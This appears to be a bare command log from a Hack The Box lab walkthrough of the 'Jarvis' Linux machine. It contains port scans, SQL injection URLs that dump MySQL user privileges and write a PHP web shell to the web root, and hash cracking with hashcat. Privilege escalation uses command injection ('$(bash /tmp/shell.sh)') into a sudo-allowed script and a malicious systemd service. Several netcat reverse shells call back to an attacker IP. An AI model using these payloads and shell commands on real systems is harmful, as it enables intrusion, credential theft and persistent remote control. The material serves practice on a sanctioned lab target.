Jarvis
HTB Linux
echo “10.129.203.177 jarvis.htb” | sudo tee -a /etc/hosts
nmap -p- —open -T5 -v -n 10.129.203.177
nmap -p- —open -sS —min-rate 5000 -vvv -n -Pn 10.129.203.177 -oG allPorts
extractPorts allPorts
nmap -sCV -p80,443 10.129.203.177 -oN targeted
http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,version(),3,4,5,6,7 http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,group_concat(user,0x3a,file_priv),3,4,5,6,7%20from%20mysql.user
http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,%22%3C?php %20echo%20system($_REQUEST[%27test%27]);%20?%3E%22,3,4,5,6,7%20into %20outfile%20%27/var/www/html/shell.php%27
hashcat —examples-hashes | grep -i “sha1”
hashcat -m 300 -a 0 hash /usr/share/wordlists/rockyou.txt
nmap —script http-enum -p80 10.129.203.177 -oN ../nmap/webScan
Corremos linEnum.sh
sudo -l
python simpler.py -p
‘10.10.14.125’
nc -lvnp 443
echo “nc -e /bin/sh 10.10.14.125 443” > /tmp/shell.sh
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
$(bash /tmp/shell.sh)
nc -lvnp 443
echo ‘[Service]
Type=notify ExecStart=/bin/sh -c “nc -e /bin/bash 10.10.14.125 443” KillMode=process >Restart=on-faillure RestartSec=42s [Install] WantedBy=multi-user.target’ > new.service systemctl link /home/pepper/new.service systemctl start new
nc -lvnp 443
